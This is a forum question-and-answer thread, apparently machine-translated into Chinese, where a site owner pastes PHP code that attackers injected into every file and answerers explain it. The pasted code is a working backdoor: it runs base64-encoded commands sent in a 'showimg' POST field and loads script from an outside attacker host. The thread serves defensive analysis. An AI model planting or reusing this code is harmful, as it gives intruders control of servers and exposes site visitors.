遭遇黑客攻擊 - 任何人都知道這個PHP代碼有什么用？

Question

我們的服務器通過一些SQL注入方法（現已修補）被黑客入侵。 我們所有的PHP文件都將其添加到每個文件的最頂層。

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

它似乎設置了一個cookie，但我不知道它的作用。

任何專家能夠理解這是什么以及可能創建的Cookie名稱可能是什么樣的，所以我可以告訴任何用戶等

更新看到該漏洞是由於Zenphoto Gallery軟件中的一個名為Tiny_MCE的插件。

Answer 1

首先它設置一個cookie。 （命名為lb11）為102。

如果它（稍后？）找到cookie，它會將cookie設置為1000到9000之間的隨機值，這樣它就不會再次執行此操作：用戶是否請求（並執行）一個javascript，它會發送哪個受感染的URL撥打電話，然后刷新頁面，（因此在javascript運行后似乎沒有發生任何事情。

但無論如何，如果將“showimg”參數傳遞給頁面，它會查看該頁面的內容，並在服務器上執行它。

因此，如果此代碼存在，它將運行javascript（它還通知服務器哪個URL被感染，然后讓該人在受感染的服務器上運行任意代碼（通過showimg參數）。

這有2層攻擊，它可以用javascript攻擊客戶端，以后可以攻擊服務器並在其上運行任意代碼。

Answer 2

我可能在這里錯了，但從它的外觀（沒有測試代碼中的鏈接）; 它可能試圖注入一些可能是惡意的客戶端JavaScript。 這通常會通過惡意軟件等感染訪客計算機。

至於cookie名稱。 我會讓你的訪問者刪除你域名的所有cookie，但從它的外觀來看，cookie被稱為“lb11”

我不喜歡看你能理解的鏈接;）